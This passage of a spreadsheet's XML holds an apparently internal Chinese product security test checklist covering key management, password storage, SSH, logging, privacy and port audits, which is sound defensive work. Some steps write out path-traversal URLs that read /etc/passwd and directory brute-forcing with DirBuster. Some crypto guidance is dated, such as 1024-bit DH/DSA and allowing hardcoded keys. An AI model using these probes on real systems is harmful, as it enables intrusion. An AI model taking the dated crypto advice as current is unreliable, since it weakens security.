4、查看产品文档，看是否存在工作密钥在不同产品间或产品不同组件间分发的应用场景，如果存在，则查看相关传输是否加密。
5、查看产品文档，看是否存在系统间共享密钥的应用场景，如果存在，则查看系统间共享密钥的生成方式。
备注：本用例可以结合对产品线人员访谈进行。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.遍历数据库中涉及密码存储的表字段检查，不存在明文存储的密码，采用单向加密算法进行加密保护（比如SHA256、HMAC-SHA1、HMAC-SHA256等）：
  a.对于新开发产品（资料规范）检查数据库接口说明书，搜索出相关字段；
  b.oracle数据库使用“SELECT * FROM USER_TAB_COLUMNS where column_name LIKE '%PASS%' ORDER BY TABLE_NAME”，搜索相关字段；
  c.其他数据库可以飞检或者导出数据库到一个文件中；内存数据库通常有接口文档，搜索相关字段。
2.遍历系统所涉及的所有文件，检查不存在明文存储的敏感信息，且所使用的加密算法符合要求：
  a.find . -name "*" | xargs grep -i "passw"（举例）
3.遍历版本发布路径中其他安装在Window或者其他终端上的程序：
  a.安装完成或者解压完毕后使用Search and Replace.zip搜索相关字段。
4.遍历日志文件或日志表，搜索密码/口令相关字段，不存在明文打印的密码，必须加密或掩码处理：
  a.打开debug日志执行自动化/手工用例保存日志；
  b.搜索代码类似log_debug.log_echo等打印语句是否涉及密码。
4.遍历其他提供给用服或者定制的软件/工具，只要接入客户网络，应该满足红线要求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、登陆设备，配置密钥自动更新任务。
2、如果密钥更新过程涉及其他网元设备（例如：由其他网元产生新密钥下发给被测设备或通过CMPv2等协议更新密钥），则尝试通过抓包工具或报文镜像等方法抓取密钥更新过程报文，看传输过程中，密钥是否加密。
3、密钥更新成功或失败（可以尝试在密钥更新过程中断开物理链路使密钥更新失败）后，查看是否有相应告警上报或日志记录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过访谈或查看产品资料，看产品是否支持某些高危操作或命令，例如：某些性能调测命令、某些存储空间清理操作等。
2、看产品资料对高危操作或命令的应用场景是否描述清晰，并对可能造成的后果提示明确。
3、尝试使用高危操作或命令，看系统是否实时提示操作的危险性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.需要通过用户名、口令等访问控制才能够进入系统，并对日志模块/文件进行访问；
2.使用非管理员帐户做删除日志操作，应该无法删除日志；
3.管理员是否允许删除日志要看系统设计的要求来区别对待；
4.如果不允许任何人日志删除，则应该确认日志存储空间大小合适，推荐可设置，日志存储空间占满之后的日志记录方式是如何实现的，推荐使用会滚方式按最早的记录覆盖写入。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、双击运行DirBuster.jar。
2、在host栏中填入目标IP地址或域名，在Port栏中输入服务器对应的端口。如果服务器只接受HTTPS请求，则需要选择Protocol为HTTPS。
3、在file with list of dirs/files栏后点击browse，选择破解的字典库为directory-list-2.3-small.txt。
4、将File extension中填入正确的文件后缀，默认为php，如果为jsp页面，需要填入jsp。
5、其他选项不变，点击右下角的start，启动目录查找。 
6、观察返回结果，可点击右下角的report，生成目录报告。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查找产品代码中的登陆认证流程。
2、看是否存在特定的操作或超级口令等隐秘通道可以直接绕过登陆认证过程，直接登陆成功。（常见的隐秘通道有：组合键、鼠标特殊敲击、连接特定接口、使用特定客户端、使用特殊URL、根据代码中写死的字符串做认证凭证。）
备注：此检查项也可以结合对开发人员的访谈进行。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥存储时提供完整性保护，符合要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感信息在产品中要加密保存。在不需要还原的场景，必须采用不可逆的加密算法。
2、禁止使用私有加密算法（包括用base64编码实现的伪加密）。
3、产品使用的加密算法复杂度要符合要求（sha256、aes256等）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统日志记录所有管理面用户的活动和操作，且日志记录完善，能支撑事后审计。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>tshark抓包无法显示明文信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统所有人机帐号和机机帐号必须记录在产品资料中。
2、开源及第三方软件的所有人机帐号和机机帐号必须记录在资料里。
3、用户可以修改自己帐号的口令。
4、系统须给具有帐号管理权限的管理员提供创建帐号的功能，单用户场景除外
5、系统须给具有帐号管理权限的管理员提供查看、编辑系统中的帐号属性的功能（如：重置口令、锁定解锁、设定有效期等）
6、系统须给帐号管理员提供删除帐号的功能，单用户场景除外
7、帐号删除后，与该帐号的权限相关的所有属性须同时使之失效，不可重用
常见错误：
1、口令是根据设备的SN号派生而来，并且密码不能修改
2、因为数据库连接口令以硬编码的形式固化在代码中，导致数据库的连接口令无法被修改（一旦修改数据库连接口令将导致应用程序无法正常连接数据库）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.ssh的root远程待确认</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>抓包显示Client Protocol: SSH-2.0-Ganymed_261和Server Protocol: SSH-2.0-OpenSSH_6.2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>发送超大数据包让SSH进行压缩</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>vpn认证接入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用tshark嗅探未发现明文数据包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>45下非hadoop-NJ用户可以读取其.bash_profile文件，存在窃取hive执行权限风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.获取用户通信数据满足法务部的要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：nmap扫描发现通信矩阵中未描述端口5070。
问题2（致命）：通过nmap扫描结果与通信矩阵对比，发现部分端口（如21、990、22、443、2222、2121、2323等）并不在系统中开启，但仍在通信矩阵中有描述。实测结果：通信矩阵描述了系统中不使用的端口。修改建议：更新通信矩阵，保证通信矩阵文档中仅说明系统使用的端口。
问题3（致命）：通过nmap扫描结果与通信矩阵对比，发现nmap扫描端口（1990、5916、58934）没有在通信矩阵中描述。实测结果：系统开启了1990、5916、58934端口，但在通信矩阵没有描述。修改建议：确认以上端口是否为必要服务，如是则更新通信矩阵，否则在系统中关闭以上端口。
问题4（致命）：OC部件 OC Nmap扫描有多个端口默认打开，通信矩阵中没有描述。
问题5（致命）：SOD上开启了java进程和端口，未在端口矩阵中描述。
问题6（致命）：telnet 8082端口，从返回信息来看，是HTTP协议。但在端口矩阵中没有找到说明用途。
问题7（致命）：SC通信矩阵漏掉了2776和2777两个端口记录，研发定位为H460端口复用的端口。
问题8（致命）：1，漏写了ccu的161端口2，ccu的trap上报端口中，网管侧端口错写为161，应为1623，22端口的记录中，错写源IP和目的IP。
问题9（致命）：通信端口未在产品提交的通信矩阵表中说明。Android espace客户端：1）网关（Security gateway port range：1-65535）、服务器端口（Sever port range：1-65535）；2）VOIPConfigParamsData,java 本地端口10500；3）Configresource.java 8080端口；4）VideoCaps.java 视频媒体的本地端口 10580；IOS 客户端：1）Localizable.strings网关、服务器端口；2）CallServiceImp.mm 10580端口。
问题10（致命）：1）设备在正常运行态时不支持FTP服务，但运行在BIOS态时是支持FTP服务的。如果软件大包或数据库损坏，设备则会自动切换到BIOS态下运行。BIOS态下的FTP登录用户名密码，与BIOS态下登录网元的用户名密码相同。通过FTP服务，用户可以下载或上传设备FLASH等存储介质上的文件。
问题11（致命）：BMC SOL端口监听在所有IP上，与设计需求和端口矩阵描述不符。攻击者可以从外部IP上可以劫持SOL连接。
问题12（严重）：Nmap扫描10.137.109.141 NAG网元，有非预期开放的9021 UDP端口，未在通信矩阵中进行描述。未公开的端口容易被质疑为产品留有后门。经确认9021端口为oracle内部mmon进程通信端口，用于存储管理和统计，实际用到，但是资料中漏描述端口及端口用途。
问题13（严重）：19001端口提供TLV连接服务，通信矩阵中说明是绑定管理IP的，但实际上配置的是通配监听，事实上有通过前端IP建立的连接；连接建立后不会超时退出，导致DOS攻击。
The service running at TCP/32862 is not listed in the U2000 Port Matrix document [1] or the HTML output generated by InstallCheck.sh</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>组件间未涉及tls协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sshv2认证使用RSA算法，之后传输数据使用AES128加密数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>源代码中不包含任何帐号，任意类型的帐号可配置。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无高风险级别漏洞，中低风险级别当前版本确实无法解决的，已给出分析结论并明确后续解决版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.拥有Web服务器操作系统的帐号和口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.数据文件的other组权限为0
注：重点是配置文件、数据文件、日志文件的权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1.45服务器9421&amp;9422端口以root起进程
</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>sshv2认证使用RSA算法，之后scp传输数据使用默认</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>AES128</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>加密数据</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TCC下未发现执行hive日志记录？是否在FI侧审计？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.产品发布时应打上最新的操作系统安全补丁，并进行兼容性测试。
2.考虑到兼容性等问题，测试时补丁版本可以公司补丁公告对齐，如果公司补丁长期未更新，建议以外部公布的已知漏洞的危害为准，进行最新补丁更新。
公司补丁公告以及获取路径参见：
http://hi3ms.huawei.com/hi/group/2288。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>敏感数据加密和传输加密的密钥，禁止硬编码在代码中，需要加密保存在配置文件或者数据库中。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥存储时提供机密性保护，符合要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高 注：可通过WebScarab/burpsuite_v1.4.01.jar抓包获取页面的URL后粘贴到IE进行访问测试，其他接口参考产品自己的工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统在收集用户数据需要得到用户的同意</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥支持可更新，符合要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>其他 渗透专家建议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、面向连接的协议提供超时退出机制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1、禁止使用SSH V1.x 版本
2、如果系统同时支持SSH V1.x和V2版本，禁止开启SSH V1.x
3、</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>SSH不可以root帐号远程登录</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
4、自研的或修改自开源第三方的SSH V2协议或应用在登录时，应显示服务端公钥的数字指纹
5、自研的或修改来自开源第三方的SSH V2协议，除了支持基于口令的认证方式之外，还应支持基于公钥的认证方式
6、因兼容性需打开SSH V1.x或telnet时，应提示风险</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1.新开发产品通过检查设计文档，查看加解密相关设计是否满足要求
2.定制/补丁版本由于历史原因造成设计文档不全或者老代码无持续维护潜藏风险通过以下方式：
a.结合敏感数据加密存储红线条目一起测试：搜索数据库/文件/内存等存储的所有密码、银行账号、密钥等敏感数据，确认其算法，检查是否满足要求
b.使用Search and Replace.zip扫描代码中非法算法关键字比如专利算法的：IDEA
c.代码飞检
注：
禁止使用的私有算法：
1. 自行定义的通过变形/字符移位/替换等方式执行的数据转换算法
2. 用编码的方式（如Base64编码）实现数据加密的目的的伪加密实现
3、当前的专利算法包括但不限于：IDEA（已过专利保护期的加密算法已不再受专利保护）
4、已经被证明不再安全的公开加密算法包括：DES、RC2、MD5、SHA1、HMAC-MD5、HMAC-SHA1；
对称加密算法建议使用：AES；
密钥交换算法建议使用：DH；
数字签名算法建议使用：DSA、ECDSA；
非对称算法建议使用：ECC、RSA；
HASH（哈希）算法建议使用：SHA；
HMAC（基于哈希的消息验证码）算法建议使用：HMAC-SHA；
建议的各算法建议采用如下的加密强度：
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>加密算法 最小强度 建议的默认强度 要求更高强度时建议的默认强度
AES 128 128 192、256
DH 1024 1024 2048
DSA 1024 1024 1024
ECC 192 192 216
ECDSA 192 192 216
RSA  2048
SHA 224 256 384、512
HMAC HMAC-SHA224 HMAC-SHA256 HMAC-SHA384、HMAC-SHA512</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>各组件提供log</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010601_004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>004 访问权限范围内的敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业界标准 OWASP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>其他</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品不存在隐秘的通道可以绕过认证，直接登陆系统。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看报告，无High及以上级别的漏洞
2.如果有High以上级别漏洞，需要联合产品线，共同确认有无实际问题。若确实存在High级别以上问题，则该用例不通过。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>待测组件未涉及OpenSSL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.所有业务不使用的接口（包括无线接口）接口为down状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.操作系统用户能够独立、随时的修改自身口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.打开日志查询页面
2.检查安全事件及操作事件有没有相应的日志记录
3.检查日志是否包含以下内容：事件发生的时间、客户端IP、成功或失败标识、事件的详细描述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已完成扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>此次测试组件不涉及API相关</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 红线观察项</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 A2 8.1.3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已完成端口扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>确认密码算法强度合规</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>确认在FI侧审计</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过在用户的./bash_profile 文件中添加export TMOUT=1800，可以实现1800s连接自动断开，但是要设置自己的xshell不能短时间（例如1分钟）发送一次心跳</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>015 针对敏感国家具体法律法规的要求，对云服务获取的用户通信数据予以保留一定时限（以法律要求为准）和按相关法律规定的保存条件保存。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>016 在需要收集、处理用户信息的场景，应当将收集信息的必要性、用途着重告知用户并获取用户同意，数据的收集符合我司隐私政策之内容。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>006 代码中不存在硬编码的加密密钥</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品是否处理、使用了非业务所必需的个人数据，如果使用了容易引发用户的质疑和投诉，同时也违背了个人数据保护法中的最小限度原则</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感个人数据的泄露、滥用，可能导致对个人的歧视、迫害等，法律通常都会对此进行特殊保护。由于敏感个人数据的收集和使用风险很高，并且消费者BG目前暂无业务场景涉及敏感个人数据，因此禁止收集和处理。如有业务需要进行敏感个人数据收集和处理，是否已经到安全体系进行业务决策</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>压缩数据包前进行验证，如超过规定的容量则不予压缩。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>压缩数据包前未进行容量认证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统以块形式读取文件传输</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目前服务器业务与操作系统管理公用bond1网卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、是否对目标系统进行安全配置实现三面隔离</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.结合产品资料，检查实际产品的系统账号的初始口令是否符合公司安全红线口令复杂度要求
2.检查产品资料中是否提示用户定期更新系统账号的口令，并提示相关风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对传输文件格式有检查，根据配置文件设置，比如将part.tbl文件改名为part或者part.aa，传输会报错</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止在Cookie中存放个人数据，如果必须在Cookie中保存个人数据，则这些数据应加密。如果全程使用安全通道传输Cookie，则不作要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、不存在用户未知的帐户
2、产品资料中提供所有账号及管理操作说明
3、确保所有用户都在资料中描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>必须同时满足以下所有条件：
1.产品配套有接口说明文档，包含所有对内对外接口的说明（说明信息必须包含接口用途、格式、调用方法等）
2.禁止不经认证直接访问：
1）接口必须提供认证机制，且认证必须默认为开启状态
2）外部接口不允许采用IP弱认证，内部接口如果采用IP弱认证，则必须保证日志能够记录准确的IP信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只能通过正常的访问方式进入系统，除此之外的访问方式都不存在，例如以下隐蔽访问方式都不存在：
隐藏账号、隐藏口令、无鉴权的隐藏模式命令/参数、隐藏组合键访问方式；隐藏的协议/端口/服务；隐藏的生产命令/端口、调试命令/端口
注：不在正规发布资料中明确描述的合理跳转方式同样不允许存在（这里的跳转不包括内部未变更权限的跳转，只针对不同级别不同模块产品间的跳转，有问题的如：和第三方未经商定就允许其链接到鉴权后的页面或功能模块）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在客户端中，Portal需要更关注本条红线，主要检查是否有相关的资料
2、资料一般随解决方案发布，关注解决方案资料中是否有相关内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 认证凭证数据（密码、口令、指纹等）须加密存储</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、认证凭证（密码、口令、指纹模板等）往往涉及用户的利益和隐私，所以需要检查是否对认证凭证进行加密存储。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、认证凭证（密码、口令、指纹模板等）往往涉及用户的利益和隐私，一旦泄露，会对用户造成重大损失（如网上银行交易密码），所以在进行设计时，必须对认证凭证进行加密存储。
对认证凭证进行加密时，必须选择安全且合适的加密算法：
- 针对不需要还原的场景（指不需要经过逆运算还原出加密前内容的场景，如登录），须使用单向不可逆加密算法，以保证加密后数据无法被破解。推荐使用SHA-256及以上算法。
- 针对需要还原的场景，须使用对称加密算法，推荐使用AES、3DES算法。其中，密钥强度要求128及以上，对于3DES，同时要求K1≠K2≠K3。
对于加密密钥的保存，原则上要求对密钥进行加密存储，但是，如果设备没有根密钥，会存在对密钥进行加密所使用的密钥无法加密保存的情况，所以允许使用硬编码密钥，建议对密钥分散存储，以提高安全性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>002 日志中应避免打印个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查是否在日志中明文打印相关个人数据
2、检查是否控制日志访问权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、日志的作用一般是用于记录关键操作用于追溯，或者用于问题定位，如果日志中出现个人数据，会引起用户的质疑，带来不必要的麻烦。
因此，日志中应避免打印个人数据。
2、如果必须打印个人数据（如调试目的），必须对日志文件做访问权限控制，同时建议对个人数据进行匿名化处理，防止应用或个人通过日志获取用户的个人数据。
匿名化处理可以对原始数据进行哈希，并在哈希时加入盐值</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于应用来说，能够访问的存储区域主要有应用所在进程内部的存储区以及公共存储区（SD卡）。一般来说，应用程序应该将运行数据保存在进程内部的存储区域，以防止其他应用访问这些数据。
但是对于图片、视频等媒体文件，由于文件较大，允许保存在公共存储区
2、对于高安全要求的数据（如：DRM），可以保存在安全文件系统SFS中（SFS一般在芯片系统中提供）；如果数据涉及防篡改要求，可以保存在RPMB分区</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访谈确认：
1、确认在代码中是否存在用户无法修改的口令（硬编码的口令），使得可以使用这些口令来登陆客户端，查看其他用户的数据等
2、检查资料是否提供口令修改说明
3.检查是否存在特殊口令可绕过口令防暴力破解机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、软件代码中，不存在任何硬编码的口令
2、所有的登录操作需要将密码发送到服务端进行验证
3、不存在用户无法修改的口令（含程序中的硬编码口令），产品资料中提供修改说明，使用修改说明中的方法，所有口令都可以修改。
4、口令认证中不存在可以绕过防暴力破解机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、不需要的功能需要彻底将代码删除
2、不能通过逻辑判断、配置文件等，在局点中禁用某项功能，涉及敏感数据上传的需求（如上传联系人、短信、个人资料、位置信息、通话记录等），若局点不需要，应将代码彻底删除，而不是通过逻辑判断、配置参数、配置文件等方式禁用功能
3.注释的代码或其它形式的解释性代码应删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法1：访谈确认客户端是否存在后台的接口，使得能够被远程控制，如访问用户本地文件、搜集用户信息等
方法2：通过nmap扫描端口并对比通信 矩阵来比对确认是否存在后台端口使得能够被运程控制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查产品是否有口令破解的命令
2.检查是否有破解口令的工具
3.检查密文、密钥是否放在一起</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以系统管理员登录系统，访问系统的权限管理模块，检查系统的权限管理是否基于以下步骤：
1、创建角色
2、为角色分配权限
3、创建帐号并指定其所属角色
4、帐号自动继承角色所拥有的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 登陆Web Portal，访问各个页面（重点检查提供下载文件功能的页面），查看浏览器地址栏中是否存在如下形式的URL地址：
http://www.exmaple.com/test/read.do?file=a.xls
http://www.exmaple.com/test/b.jsp?filename=b.doc
http://www.exmaple.com/test/servlet?filename=d.txt
也就是说，Web服务器根据客户端提交的文件名参数的值，读取服务器上对应的文件，并将信息返回给客户端。
2、尝试将URL地址中的文件名参数的值修改为访问系统文件（例如/etc/passwd）的相对路径值，例如：
猜测并更改URL路径
http://www.exmaple.com/test/read.do?file=../../etc/passwd
http://www.exmaple.com/test/read.do?file=../../../etc/passwd
http://www.exmaple.com/test/read.do?file=../../../../etc/passwd
http://www.exmaple.com/test/read.do?file=../../../../../etc/passwd
……
3、 观察页面返回信息，如果可以获取到服务器的系统文件（如passwd）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.是否提供用户数据可以为用户本人所控制、查询、更新、删除的功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥分层管理可以提高密钥管理体系的安全性，防止密钥管理体系中一个密钥被攻破导致整个密钥管理体系的崩溃，避免密文数据全部被解密并泄露；
2、密钥分层管理可以减小密钥更新的开销；
3、密钥封层管理可以避免直接使用根密钥加密业务数据，大大减小攻击者使用各种密码分析手段获取根密钥的可能性，从根本上确保密码体系的安全性。
检查密钥使用和密钥管理是否符合要求：
1、禁止根密钥直接加密数据（如：网络传输的业务数据、用户口令、配置文件、数据库敏感字段等）、根密钥应该只被用作加密密钥（如：工作密钥），而由工作密钥加密数据；
2、应根据实际场景决定采用二层密钥管理结构或是三层密钥管理结构</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>采用密钥组件方式生成根密钥时，密钥组件的安全性是根密钥的基础，如果密钥组件被攻击者获取，根密钥将可以被轻易的还原。保存密钥组件的文件名应该尽可能一般，这样即使攻击者突破了系统的访问控制，可以访问系统中的文件，也难以从大量的文件中轻易辨别出存放密钥组件的文件，这将给攻击者获取密钥材料增加困难。检查密钥组件文件名是否符合要求：
1、密钥组件的文件名是否包含“加密算法、密钥长度、密钥组件序号、密钥组件总数、密钥名称、组件名称、密钥组件构成、与其它密钥组件的关系、加密模式、域参数”等信息。（如：Key_AES128_Component3）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果不再使用的密钥没有立即删除，针对不再使用的密钥又存在管理漏洞，攻击者可能获取不再使用的密钥和使用该密钥加密的密文数据，然后攻击者可以利用密钥解密密文数据，造成信息泄露。如果不再使用的密钥被立即删除，即使攻击者可以获取对应的密文信息，也无法解密，从根本上切断了信息泄露的源头。密文数据可能分散保存在应用系统中或系统外的不同位置，在密钥不在使用后，销毁不同位置的密文以避免信息泄露较为困难。
检查密钥的销毁是否符合要求：
1、对于内存中的密钥，是否对保存密钥的内存空间填充了其他值。（如：全0）
2、对于本地存储（本地文件、数据库等）的密钥（通常以密文形式存在），是否被完全删除（包括密钥的全部副本）并对相应的磁盘空间重复写入其他数据（推荐写“0”或“1”覆盖三次或以上）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密钥的生成、使用、更新、销毁等操作是重要的管理操作。恶意的频繁触发密钥更新可能导致系统遭受DOS攻击、恶意的销毁密钥可能导致密文数据无法解密。为了追溯针对密钥管理操作的恶意攻击，密钥管理操作需要记录详细的日志。
1、密钥的生成、使用、更新、销毁等操作的操作是否记录日志
2、密钥的各项管理操作日志记录是否详细，是否记录操作的主体（人或设备）、时间、目的、结果等可用于事件追溯的信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密码算法的安全性是基于密钥的， 如果密钥泄露，攻击者可以轻易的使用密钥解密密文信息，加密机制将完全失效。如果密钥、共享秘密明文传输，攻击者可以通过简单的网络嗅探就能获取密钥并解密密文数据，数据加密传输安全机制就会完全失效；密钥在传输过程中如果被恶意篡改，将导致解密出的数据错误，如果应用系统使用错误的解密结果进行数据处理，将可能使程序进入不可预期的运行状态，损害应用程序的正常运行。
1、检查非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）是否进行了加密（如：使用对称和非对称加密算法）;
2、检查非信任网络中传输的对称密钥、共享秘密（如：预置共享密钥、PBKDF中的口令等）是否进行了完整性保护（如：使用MAC或签名算法）;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看产品资料，看证书管理部分是否提供预置华为证书私钥的导出方法。
